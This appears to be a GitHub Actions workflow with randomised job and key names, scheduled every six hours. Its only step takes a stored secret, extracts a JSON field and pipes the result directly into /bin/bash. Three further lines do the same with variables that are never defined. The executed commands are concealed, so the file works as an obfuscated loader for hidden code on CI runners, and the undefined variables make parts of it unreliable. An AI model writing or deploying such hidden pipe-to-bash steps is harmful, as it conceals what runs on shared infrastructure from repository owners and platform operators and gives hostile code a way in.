name: shenerwei7651

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shenerwei7651
        env:
          ko4: ${{ secrets.ko4 }}
        run: |
          echo $ko4 | jq -r .fyvt29341 | /bin/bash
          echo $qlvi1011 | jq -r .tmr648 | /bin/bash
          echo $eero1603 | jq -r .ismw80853 | /bin/bash
          echo $lv6117 | jq -r .w47 | /bin/bash

